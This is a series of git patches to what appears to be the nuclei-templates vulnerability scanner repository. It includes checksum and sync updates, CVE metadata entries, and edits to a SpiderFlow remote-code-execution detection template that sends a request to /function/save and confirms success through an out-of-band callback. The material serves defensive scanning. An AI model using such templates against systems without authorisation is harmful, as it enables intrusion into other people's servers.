12:25:00 +0000 Subject: [PATCH 1250/1768] Auto Generated Templates Checksum [Thu May 23 12:25:00 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 0fe3d41f5c..387c549bd8 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4727,7 +4727,7 @@ http/exposures/configs/rackup-config-ru.yaml:94f7f7fc3cc26030ca1630f9d782eeeb7d1 http/exposures/configs/rails-database-config.yaml:b02dca967dbd26612f29e13205e41e8377670897 http/exposures/configs/rakefile-disclosure.yaml:40d258c4d79613a96e9e09bfb1c940755956546b http/exposures/configs/redis-config.yaml:91875ce839649f48da4ed29d68a72f2c1ee5a1e8 -http/exposures/configs/robomongo-credential.yaml:af056f027abbdab368dbaed618eb3ba20581dbb3 +http/exposures/configs/robomongo-credential.yaml:e01f62310eddcfe819e9429da38459af9f6c5dd6 http/exposures/configs/rollup-js-config.yaml:8f2034228d8e39391f1527030b8887cb95c8d012 http/exposures/configs/rubocop-config.yaml:c4f570275da1ebe7f348c6a77006c6d26d06e711 http/exposures/configs/ruijie-information-disclosure.yaml:8b2cde25db83e7d577878b09ef7dca415fab1046 @@ -7925,6 +7925,7 @@ http/vulnerabilities/other/talroo-jobs-xss.yaml:34af231d34704c63a01bbeba21bc7174 http/vulnerabilities/other/tamronos-rce.yaml:0f057fdf03116f53c69573789145ff009573a639 http/vulnerabilities/other/tamronos-user-creation.yaml:2c73bb0f38c1ef165578c00832d316ed40faeefe http/vulnerabilities/other/tekon-info-leak.yaml:78521259191534295b7ea481980c2adee69a17ab +http/vulnerabilities/other/tendat-credential.yaml:718813e1e5a830afbff9241402d3813dfbd64f28 http/vulnerabilities/other/thinkific-redirect.yaml:251ca37bf18bf81069db0b137edd2afa0d0e4f58 http/vulnerabilities/other/thruk-xss.yaml:b6bd8aac6da2278ad8142ee74120625d3309fe4f http/vulnerabilities/other/tianqing-info-leak.yaml:bfe5a313b8c2fad5722b13e933fe3b65bc0eb89e @@ -8556,7 +8557,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:1b6bff8175b179836c5ac85910f593e2d559d909 +templates-checksum.txt:f3f365d17a887e4be9b351392082b92297401162 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 66e297c8fd381cec7c19ef8afafe26a9b9393cd5 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 23 May 2024 12:25:35 +0000 Subject: [PATCH 1251/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index cfc66bd726..3b5dbac81c 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -62,6 +62,7 @@ on: - 'http/technologies/uni-gui-framework.yaml' - 'http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml' - 'http/vulnerabilities/other/castel-digital-sqli.yaml' + - 'http/vulnerabilities/other/tendat-credential.yaml' - 'javascript/enumeration/checkpoint-firewall-enum.yaml' workflow_dispatch: jobs: From 6efa0ced6f6eafc22ba81504477310d804983976 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 23 May 2024 12:26:48 +0000 Subject: [PATCH 1252/1768] Auto Template Signing [Thu May 23 12:26:48 UTC 2024] :robot: --- http/exposures/configs/kyan-credential-exposure.yaml | 3 +-- http/vulnerabilities/other/tendat-credential.yaml | 1 + 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/http/exposures/configs/kyan-credential-exposure.yaml b/http/exposures/configs/kyan-credential-exposure.yaml index 9de83418c6..8cd0db3117 100644 --- a/http/exposures/configs/kyan-credential-exposure.yaml +++ b/http/exposures/configs/kyan-credential-exposure.yaml @@ -36,5 +36,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022021dd759f02a17681a9dba7ffa13df823c17fe69e943fc1b5c3987893d2492242022100fafe44ac4b37b58b98512d37eb32bf13ee774a2c425537ab814a0710bd81267e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a053c50c1498293195c2bde12324cbf1b0b5250abcd8d59ffd1ed275198944c90220623209957cbd63440cbd204fc4a40e731cefa0d319c0531594a2ee51ef4b0472:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/other/tendat-credential.yaml b/http/vulnerabilities/other/tendat-credential.yaml index fb861b702d..3fbbda7fe7 100644 --- a/http/vulnerabilities/other/tendat-credential.yaml +++ b/http/vulnerabilities/other/tendat-credential.yaml @@ -26,3 +26,4 @@ http: - 'contains(header, "config/conf")' - 'status_code == 200' condition: and +# digest: 4a0a00473045022009aff9d412e592f419c34a053f2e0dd2e271dfb1b8201d7e3a8e658155acd843022100e816bae0e0e3e82dc102fb1cf9b8f7a3452c55b47dfa9c0ec4cadb13c423ad37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 81fe704a0e93d7f35164fac12638687bb02fb2c2 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 23 May 2024 18:15:41 +0530 Subject: [PATCH 1253/1768] Update CVE-2024-0195.yaml --- http/cves/2024/CVE-2024-0195.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-0195.yaml b/http/cves/2024/CVE-2024-0195.yaml index c8a0ee3d6b..42561d03f0 100644 --- a/http/cves/2024/CVE-2024-0195.yaml +++ b/http/cves/2024/CVE-2024-0195.yaml @@ -24,6 +24,7 @@ info: vendor: ssssssss product: spider-flow fofa-query: app="SpiderFlow" + tags: cve,cve2024,spiderflow http: - raw: From 3ae722960fff74d21ba443488dd5e8252537966c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Thu, 23 May 2024 18:19:04 +0530 Subject: [PATCH 1254/1768] Update CVE-2024-0195.yaml --- http/cves/2024/CVE-2024-0195.yaml | 23 ++++++++++++++++++----- 1 file changed, 18 insertions(+), 5 deletions(-) diff --git a/http/cves/2024/CVE-2024-0195.yaml b/http/cves/2024/CVE-2024-0195.yaml index 42561d03f0..5da0534c4c 100644 --- a/http/cves/2024/CVE-2024-0195.yaml +++ b/http/cves/2024/CVE-2024-0195.yaml @@ -8,15 +8,15 @@ info: A vulnerability, which was classified as critical, was found in spider-flow 0.4.3. Affected is the function FunctionService.saveFunction of the file src/main/java/org/spiderflow/controller/FunctionController.java. The manipulation leads to code injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249510 is the identifier assigned to this vulnerability. reference: - https://github.com/Shelter1234/VulneraLab/blob/main/SpiderFlow/CVE-2024-0195/README.zh-cn.md - - https://github.com/wy876/wiki - - https://github.com/xingchennb/POC- + - https://vuldb.com/?id.249510 + - https://nvd.nist.gov/vuln/detail/CVE-2024-0195 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-0195 cwe-id: CWE-94 epss-score: 0.00107 - epss-percentile: 0.43408 + epss-percentile: 0.43423 cpe: cpe:2.3:a:ssssssss:spider-flow:0.4.3:*:*:*:*:*:*:* metadata: verified: true @@ -24,9 +24,22 @@ info: vendor: ssssssss product: spider-flow fofa-query: app="SpiderFlow" - tags: cve,cve2024,spiderflow + tags: cve,cve2024,spiderflow,crawler,unauth,rce + +flow: http(1) && http(2) http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'SPIDER_FLOW_VERSION' + - raw: - | POST /function/save HTTP/1.1 @@ -40,4 +53,4 @@ http: - type: word part: interactsh_protocol words: - - "dns" + - "http" From ef3e4afa7ad016d187700c25101aec1eb6f0e511 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Thu, 23 May 2024 18:20:05 +0530 Subject: [PATCH 1255/1768] dns update --- http/cves/2024/CVE-2024-0195.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-0195.yaml b/http/cves/2024/CVE-2024-0195.yaml index 5da0534c4c..c458ad3cd3 100644 --- a/http/cves/2024/CVE-2024-0195.yaml +++ b/http/cves/2024/CVE-2024-0195.yaml @@ -53,4 +53,4 @@ http: - type: word part: interactsh_protocol words: - - "http" + - "dns" From 54ea151038db5e62fcb423b958729e9432947b9a Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 23 May 2024 12:53:01 +0000 Subject: [PATCH 1256/1768] Auto Generated New Template Addition List [Thu May 23 12:53:00 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 6fcf5e4107..74817b2587 100644 --- a/.new-additions +++ b/.new-additions @@ -9,6 +9,7 @@ http/cves/2023/CVE-2023-4542.yaml http/cves/2023/CVE-2023-45855.yaml http/cves/2023/CVE-2023-5991.yaml http/cves/2023/CVE-2023-6065.yaml +http/cves/2024/CVE-2024-0195.yaml http/cves/2024/CVE-2024-0200.yaml http/cves/2024/CVE-2024-1561.yaml http/cves/2024/CVE-2024-3097.yaml From 24319535618f31c767e5d4cad7102c232a7bc2db Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 23 May 2024 12:53:05 +0000 Subject: [PATCH 1257/1768] Auto Generated Templates Checksum [Thu May 23 12:53:05 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 387c549bd8..ccc9a418c4 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3236,6 +3236,7 @@ http/cves/2023/CVE-2023-6909.yaml:4562cfd57e05ece355b437b64b4925db7a04472f http/cves/2023/CVE-2023-6977.yaml:427980251fa5fcdbdfa28dceed9f7fd1e0c17158 http/cves/2023/CVE-2023-6989.yaml:c3d929a1f1abf5fa521c9d3ea494ca2646d12c14 http/cves/2023/CVE-2023-7028.yaml:16a6a22a93bf8caea281ec34d32def83f8e06fac +http/cves/2024/CVE-2024-0195.yaml:eb8732fdcf909e648fe0b0b7b5034baef8fba762 http/cves/2024/CVE-2024-0200.yaml:b56dea46f7628a62b55f121e4d4ca7716460590f http/cves/2024/CVE-2024-0204.yaml:39634c8661238823c08664b0a4720f98fef14e49 http/cves/2024/CVE-2024-0235.yaml:14f7242039b69741ffd3e1585a856862479d1ffe @@ -4684,7 +4685,7 @@ http/exposures/configs/jsconfig-json.yaml:2b4eef2963c707feef05c1953816da94d1a331 http/exposures/configs/karma-config-js.yaml:0ef25cc1986c133be7cba2144ecd6cc287c3c4b9 http/exposures/configs/keycloak-openid-config.yaml:42ffdd485eb9de21b1cfdc3c631e384151ad5281 http/exposures/configs/kubernetes-kustomization-disclosure.yaml:eb652b556472ef31b9d25b651c66780796ef87fa -http/exposures/configs/kyan-credential-exposure.yaml:8fa3cc4b02e0d50fd78a3a033d8fd799d17af82e +http/exposures/configs/kyan-credential-exposure.yaml:89fe2c0d0d0d8af080c76f692d54c0bee6eb0442 http/exposures/configs/laravel-env.yaml:f3071adfe9141a9fdf4b7ddf913a1b05118ab9d0 http/exposures/configs/lvmeng-uts-disclosure.yaml:cc8d43b2cd08dc0ba883f385679681598ec373b2 http/exposures/configs/magento-config-disclosure.yaml:c7ed206ff84ae43bb9bbae4ddbc8e5354558076a @@ -7925,7 +7926,7 @@ http/vulnerabilities/other/talroo-jobs-xss.yaml:34af231d34704c63a01bbeba21bc7174 http/vulnerabilities/other/tamronos-rce.yaml:0f057fdf03116f53c69573789145ff009573a639 http/vulnerabilities/other/tamronos-user-creation.yaml:2c73bb0f38c1ef165578c00832d316ed40faeefe http/vulnerabilities/other/tekon-info-leak.yaml:78521259191534295b7ea481980c2adee69a17ab -http/vulnerabilities/other/tendat-credential.yaml:718813e1e5a830afbff9241402d3813dfbd64f28 +http/vulnerabilities/other/tendat-credential.yaml:a856f441a8d54650c5c7c8b80ef721111bb500ef http/vulnerabilities/other/thinkific-redirect.yaml:251ca37bf18bf81069db0b137edd2afa0d0e4f58 http/vulnerabilities/other/thruk-xss.yaml:b6bd8aac6da2278ad8142ee74120625d3309fe4f http/vulnerabilities/other/tianqing-info-leak.yaml:bfe5a313b8c2fad5722b13e933fe3b65bc0eb89e @@ -8557,7 +8558,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:f3f365d17a887e4be9b351392082b92297401162 +templates-checksum.txt:04b59522b13a9ae897489138806ed87daab73c4c wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From c4ceebffea5959cda3568c679eaccb2a8ca08a21 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 23 May 2024 12:53:46 +0000 Subject: [PATCH 1258/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 3b5dbac81c..9c8c56ad1a 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -14,6 +14,7 @@ on: - 'http/cves/2023/CVE-2023-45855.yaml' - 'http/cves/2023/CVE-2023-5991.yaml' - 'http/cves/2023/CVE-2023-6065.yaml' + - 'http/cves/2024/CVE-2024-0195.yaml' - 'http/cves/2024/CVE-2024-0200.yaml' - 'http/cves/2024/CVE-2024-1561.yaml' - 'http/cves/2024/CVE-2024-3097.yaml' From af7b08d0e017dfa44ef827e9a92fbb1f16b641e1 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 23 May 2024 12:54:44 +0000 Subject: [PATCH 1259/1768] Auto Generated cves.json [Thu May 23 12:54:43 UTC 2024] :robot: --- cves.json | 8 +++++++- cves.json-checksum.txt | 2 +- 2 files changed, 8 insertions(+), 2 deletions(-) diff --git a/cves.json b/cves.json index 160b9d0298..b5bbba72c0 100644 --- a/cves.json +++ b/cves.json @@ -1639,7 +1639,7 @@ {"ID":"CVE-2022-22242","Info":{"Name":"Juniper Web Device Manager - Cross-Site Scripting","Severity":"medium","Description":"Juniper Web Device Manager (J-Web) in Junos OS contains a cross-site scripting vulnerability. This can allow an unauthenticated attacker to run malicious scripts reflected off J-Web to the victim's browser in the context of their session within J-Web, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This issue affects all versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S7; 19.4 versions prior to 19.4R2-S7, 19.4R3-S8; 20.1 versions prior to 20.1R3-S5; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S4; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R3; 21.4 versions prior to 21.4R2; 22.1 versions prior to 22.1R2.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-22242.yaml"} {"ID":"CVE-2022-22536","Info":{"Name":"SAP Memory Pipes (MPI) Desynchronization","Severity":"critical","Description":"SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable to request smuggling and request concatenation attacks. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2022/CVE-2022-22536.yaml"} {"ID":"CVE-2022-22733","Info":{"Name":"Apache ShardingSphere ElasticJob-UI privilege escalation","Severity":"medium","Description":"Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache ShardingSphere ElasticJob-UI allows an attacker who has guest account to do privilege escalation. This issue affects Apache ShardingSphere ElasticJob-UI Apache ShardingSphere ElasticJob-UI 3.x version 3.0.0 and prior versions.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2022/CVE-2022-22733.yaml"} -{"ID":"CVE-2022-22897","Info":{"Name":"PrestaShop Ap Pagebuilder \u003c= 2.4.4 SQL Injection","Severity":"critical","Description":"A SQL injection vulnerability in the product_all_one_img and image_product parameters of the ApolloTheme AP PageBuilder component through 2.4.4 for PrestaShop allows unauthenticated attackers to exfiltrate database data.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-22897.yaml"} +{"ID":"CVE-2022-22897","Info":{"Name":"PrestaShop AP Pagebuilder \u003c= 2.4.4 - SQL Injection","Severity":"critical","Description":"A SQL injection vulnerability in the product_all_one_img and image_product parameters of the ApolloTheme AP PageBuilder component through 2.4.4 for PrestaShop allows unauthenticated attackers to exfiltrate database data.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-22897.yaml"} {"ID":"CVE-2022-2290","Info":{"Name":"Trilium \u003c0.52.4 - Cross-Site Scripting","Severity":"medium","Description":"Trilium prior to 0.52.4, 0.53.1-beta contains a cross-site scripting vulnerability which can allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-2290.yaml"} {"ID":"CVE-2022-22947","Info":{"Name":"Spring Cloud Gateway Code Injection","Severity":"critical","Description":"Applications using Spring Cloud Gateway prior to 3.1.1+ and 3.0.7+ are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2022/CVE-2022-22947.yaml"} {"ID":"CVE-2022-22954","Info":{"Name":"VMware Workspace ONE Access - Server-Side Template Injection","Severity":"critical","Description":"VMware Workspace ONE Access is susceptible to a remote code execution vulnerability due to a server-side template injection flaw. An unauthenticated attacker with network access could exploit this vulnerability by sending a specially crafted request to a vulnerable VMware Workspace ONE or Identity Manager.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-22954.yaml"} @@ -2181,6 +2181,7 @@ {"ID":"CVE-2023-35844","Info":{"Name":"Lightdash version \u003c= 0.510.3 Arbitrary File Read","Severity":"high","Description":"packages/backend/src/routers in Lightdash before 0.510.3\nhas insecure file endpoints, e.g., they allow .. directory\ntraversal and do not ensure that an intended file extension\n(.csv or .png) is used.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-35844.yaml"} {"ID":"CVE-2023-35885","Info":{"Name":"Cloudpanel 2 \u003c 2.3.1 - Remote Code Execution","Severity":"critical","Description":"CloudPanel 2 before 2.3.1 has insecure file-manager cookie authentication.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-35885.yaml"} {"ID":"CVE-2023-36144","Info":{"Name":"Intelbras Switch - Information Disclosure","Severity":"high","Description":"An authentication bypass in Intelbras Switch SG 2404 MR in firmware 1.00.54 allows an unauthenticated attacker to download the backup file of the device, exposing critical information about the device configuration.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-36144.yaml"} +{"ID":"CVE-2023-36284","Info":{"Name":"QloApps 1.6.0 - SQL Injection","Severity":"high","Description":"An unauthenticated Time-Based SQL injection found in Webkul QloApps 1.6.0 via GET parameters date_from, date_to, and id_product allows a remote attacker to retrieve the contents of an entire database.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-36284.yaml"} {"ID":"CVE-2023-36287","Info":{"Name":"Webkul QloApps 1.6.0 - Cross-site Scripting","Severity":"medium","Description":"An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST controller parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-36287.yaml"} {"ID":"CVE-2023-36289","Info":{"Name":"Webkul QloApps 1.6.0 - Cross-site Scripting","Severity":"medium","Description":"An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST email_create and back parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-36289.yaml"} {"ID":"CVE-2023-36306","Info":{"Name":"Adiscon LogAnalyzer v.4.1.13 - Cross-Site Scripting","Severity":"medium","Description":"A Cross Site Scripting (XSS) vulnerability in Adiscon Aiscon LogAnalyzer through 4.1.13 allows a remote attacker to execute arbitrary code via the asktheoracle.php\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-36306.yaml"} @@ -2274,6 +2275,7 @@ {"ID":"CVE-2023-44813","Info":{"Name":"mooSocial v.3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"Cross-Site Scripting (XSS) vulnerability in mooSocial v.3.1.8 allows a remote attacker to execute arbitrary code via a crafted payload to the mode parameter of the invite friend login function.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-44813.yaml"} {"ID":"CVE-2023-4521","Info":{"Name":"Import XML and RSS Feeds \u003c 2.1.5 - Unauthenticated RCE","Severity":"critical","Description":"The Import XML and RSS Feeds WordPress plugin before 2.1.5 allows unauthenticated attackers to execute arbitrary commands via a web shell.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4521.yaml"} {"ID":"CVE-2023-45375","Info":{"Name":"PrestaShop PireosPay - SQL Injection","Severity":"high","Description":"In the module “PireosPay” (pireospay) up to version 1.7.9 from 01generator.com for PrestaShop, a guest can perform SQL injection in affected versions.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-45375.yaml"} +{"ID":"CVE-2023-4542","Info":{"Name":"D-Link DAR-8000-10 - Command Injection","Severity":"critical","Description":"D-Link DAR-8000-10 version has an operating system command injection vulnerability. The vulnerability originates from the parameter id of the file /app/sys1.php which can lead to operating system command injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4542.yaml"} {"ID":"CVE-2023-4547","Info":{"Name":"SPA-Cart eCommerce CMS 1.9.0.3 - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability was found in SPA-Cart eCommerce CMS 1.9.0.3. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /search. The manipulation of the argument filter[brandid]/filter[price] leads to cross site scripting. The attack may be launched remotely. VDB-238058 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4547.yaml"} {"ID":"CVE-2023-45542","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in the q parameter on search function of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-45542.yaml"} {"ID":"CVE-2023-45671","Info":{"Name":"Frigate \u003c 0.13.0 Beta 3 - Cross-Site Scripting","Severity":"medium","Description":"Frigate is an open source network video recorder. Before version 0.13.0 Beta 3, there is a reflected cross-site scripting vulnerability in any API endpoints reliant on the `/\u003ccamera_name\u003e` base path as values provided for the path are not sanitized. Exploiting this vulnerability requires the attacker to both know very specific information about a user's Frigate server and requires an authenticated user to be tricked into clicking a specially crafted link to their Frigate instance. This vulnerability could exploited by an attacker under the following circumstances: Frigate publicly exposed to the internet (even with authentication); attacker knows the address of a user's Frigate instance; attacker crafts a specialized page which links to the user's Frigate instance; attacker finds a way to get an authenticated user to visit their specialized page and click the button/link. As the reflected values included in the URL are not sanitized or escaped, this permits execution arbitrary Javascript payloads. Version 0.13.0 Beta 3 contains a patch for this issue.\n","Classification":{"CVSSScore":"4.7"}},"file_path":"http/cves/2023/CVE-2023-45671.yaml"} @@ -2322,6 +2324,7 @@ {"ID":"CVE-2023-6023","Info":{"Name":"VertaAI ModelDB - Path Traversal","Severity":"high","Description":"The endpoint \"/api/v1/artifact/getArtifact?artifact_path=\" is vulnerable to path traversal. The main cause of this vulnerability is due to the lack of validation and sanitization of the artifact_path parameter.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6023.yaml"} {"ID":"CVE-2023-6038","Info":{"Name":"H2O ImportFiles - Local File Inclusion","Severity":"high","Description":"An attacker is able to read any file on the server hosting the H2O dashboard without any authentication.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6038.yaml"} {"ID":"CVE-2023-6063","Info":{"Name":"WP Fastest Cache 1.2.2 - Unauthenticated SQL Injection","Severity":"high","Description":"The WP Fastest Cache WordPress plugin before 1.2.2 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6063.yaml"} +{"ID":"CVE-2023-6065","Info":{"Name":"Quttera Web Malware Scanner \u003c= 3.4.1.48 - Sensitive Data Exposure","Severity":"medium","Description":"The Quttera Web Malware Scanner WordPress plugin before 3.4.2.1 doesn't restrict access to detailed scan logs, which allows a malicious actor to discover local paths and portions of the site's code\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-6065.yaml"} {"ID":"CVE-2023-6114","Info":{"Name":"Duplicator \u003c 1.5.7.1; Duplicator Pro \u003c 4.5.14.2 - Unauthenticated Sensitive Data Exposure","Severity":"high","Description":"The Duplicator WordPress plugin before 1.5.7.1, Duplicator Pro WordPress plugin before 4.5.14.2 does not disallow listing the `backups-dup-lite/tmp` directory (or the `backups-dup-pro/tmp` directory in the Pro version), which temporarily stores files containing sensitive data. When directory listing is enabled in the web server, this allows unauthenticated attackers to discover and access these sensitive files, which include a full database dump and a zip archive of the site.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6114.yaml"} {"ID":"CVE-2023-6360","Info":{"Name":"WordPress My Calendar \u003c3.4.22 - SQL Injection","Severity":"critical","Description":"WordPress My Calendar plugin versions before 3.4.22 are vulnerable to an unauthenticated SQL injection within the 'from' and 'to' parameters of the '/my-calendar/v1/events' REST route.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6360.yaml"} {"ID":"CVE-2023-6379","Info":{"Name":"OpenCMS 14 \u0026 15 - Cross Site Scripting","Severity":"medium","Description":"Cross-site scripting (XSS) vulnerability in Alkacon Software Open CMS, affecting versions 14 and 15 of the 'Mercury' template.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-6379.yaml"} @@ -2338,6 +2341,7 @@ {"ID":"CVE-2023-6977","Info":{"Name":"Mlflow \u003c2.8.0 - Local File Inclusion","Severity":"high","Description":"Mlflow before 2.8.0 is susceptible to local file inclusion due to path traversal in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6977.yaml"} {"ID":"CVE-2023-6989","Info":{"Name":"Shield Security WP Plugin \u003c= 18.5.9 - Local File Inclusion","Severity":"critical","Description":"The Shield Security Smart Bot Blocking \u0026 Intrusion Prevention Security plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 18.5.9 via the render_action_template parameter. This makes it possible for unauthenticated attacker to include and execute PHP files on the server, allowing the execution of any PHP code in those files.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6989.yaml"} {"ID":"CVE-2023-7028","Info":{"Name":"GitLab - Account Takeover via Password Reset","Severity":"critical","Description":"An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2023/CVE-2023-7028.yaml"} +{"ID":"CVE-2024-0195","Info":{"Name":"SpiderFlow Crawler Platform - Remote Code Execution","Severity":"critical","Description":"A vulnerability, which was classified as critical, was found in spider-flow 0.4.3. Affected is the function FunctionService.saveFunction of the file src/main/java/org/spiderflow/controller/FunctionController.java. The manipulation leads to code injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public 